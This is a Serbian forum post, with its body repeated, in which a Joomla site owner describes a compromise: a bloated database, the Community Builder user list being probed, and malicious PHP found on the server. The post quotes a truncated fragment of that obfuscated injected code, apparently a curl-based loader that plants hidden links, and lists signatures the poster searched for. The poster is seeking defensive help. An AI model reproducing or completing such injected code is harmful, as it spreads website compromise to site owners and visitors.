SQL injekcija ili...?
Posted: Fri Aug 23, 2013 2:24 pm
Pozdrav svima,
primetio sam da mi je baza jako velika (1600mb) pa rekoh da vidim šta ima u njoj. 1000mb je bila tabela redirect_links a oko 500 tabela rokusers.Obrisao sam rokusers i ispraznio redirect_links i sajt je ostao sa bazom 38mb.
Primetio sam da se u komponenti redirection (Redirect Manager: Links) svake sekunde pojavljuju linkovi koji ne postoje, pa ih komponenta beleži i baza raste svake sekunde.
Problem sam rešio tako što sam isključio plugin System - Redirect, baza više ne raste.
Medjutim, problem sigurno i dalje postoji, nešto i dalje pokušava da otvori adrese tipa
korisnicki-profil/userslist/Lista članova sajta?cbsecuritym3=cbm_25ddd2ac_623e4e28_47713abb5dd2b5632e1bee65d0176db8&limit=30&start=1980
korisnicki-profil/userslist/Lista članova sajta?cbsecuritym3=cbm_68160aac_7cc41830_f3e9c09c2eac72d2dc6e3d959a465e21&limit=30&start=2220
korisnicki-profil/userslist/Lista članova sajta?cbsecuritym3=cbm_7623c2a6_5deba3db_f722eab0779c1a47033787056d19c3f2&limit=30&start=180
U pitanju je komponenta community builder ali nikako ne mogu da nadjem uzrok.
Na sajtu sam našao par malicioznih kodova tipa:
<?php /*versio:2.11*/$Q000Q=0;$GLOBALS['IlII'] = '0fY3VybA62X2luaXQ%.1!3&YWxsb3dfdXJsX2ZvcGVu!55MQ64^X3NldG9wdA1#X2V4ZWMXwcY2xvc2U*.
PGltZyBzcmM9Ig~IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4ddwa29ubW8ubmV0d8_a3RpcHAuY2g7
%00&c2lsYmVyLmRlf$&~@WV8~e5Og*7~ZGlzcGxheV9lcnJvcnM__@5*ZGV0ZXJtaW5hdG9y*YW5k9(&
Mi4xMQ...
Sve sam uklonio i na hostu sigurno nema ništa što sadrži: /*versio: ili <?php(sa velikim razmacima posle)
Zna li neko kako bih mogao da pronadjem ekstenziju, koje ključne reči da ukucam u pretragu php fajlova.
Pomaže li išta Marco's SQL Injection
Kada isključim SEF sve radi kako treba
hvala
primetio sam da mi je baza jako velika (1600mb) pa rekoh da vidim šta ima u njoj. 1000mb je bila tabela redirect_links a oko 500 tabela rokusers.Obrisao sam rokusers i ispraznio redirect_links i sajt je ostao sa bazom 38mb.
Primetio sam da se u komponenti redirection (Redirect Manager: Links) svake sekunde pojavljuju linkovi koji ne postoje, pa ih komponenta beleži i baza raste svake sekunde.
Problem sam rešio tako što sam isključio plugin System - Redirect, baza više ne raste.
Medjutim, problem sigurno i dalje postoji, nešto i dalje pokušava da otvori adrese tipa
korisnicki-profil/userslist/Lista članova sajta?cbsecuritym3=cbm_25ddd2ac_623e4e28_47713abb5dd2b5632e1bee65d0176db8&limit=30&start=1980
korisnicki-profil/userslist/Lista članova sajta?cbsecuritym3=cbm_68160aac_7cc41830_f3e9c09c2eac72d2dc6e3d959a465e21&limit=30&start=2220
korisnicki-profil/userslist/Lista članova sajta?cbsecuritym3=cbm_7623c2a6_5deba3db_f722eab0779c1a47033787056d19c3f2&limit=30&start=180
U pitanju je komponenta community builder ali nikako ne mogu da nadjem uzrok.
Na sajtu sam našao par malicioznih kodova tipa:
<?php /*versio:2.11*/$Q000Q=0;$GLOBALS['IlII'] = '0fY3VybA62X2luaXQ%.1!3&YWxsb3dfdXJsX2ZvcGVu!55MQ64^X3NldG9wdA1#X2V4ZWMXwcY2xvc2U*.
PGltZyBzcmM9Ig~IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4ddwa29ubW8ubmV0d8_a3RpcHAuY2g7
%00&c2lsYmVyLmRlf$&~@WV8~e5Og*7~ZGlzcGxheV9lcnJvcnM__@5*ZGV0ZXJtaW5hdG9y*YW5k9(&
Mi4xMQ...
Sve sam uklonio i na hostu sigurno nema ništa što sadrži: /*versio: ili <?php(sa velikim razmacima posle)
Zna li neko kako bih mogao da pronadjem ekstenziju, koje ključne reči da ukucam u pretragu php fajlova.
Pomaže li išta Marco's SQL Injection
Kada isključim SEF sve radi kako treba
hvala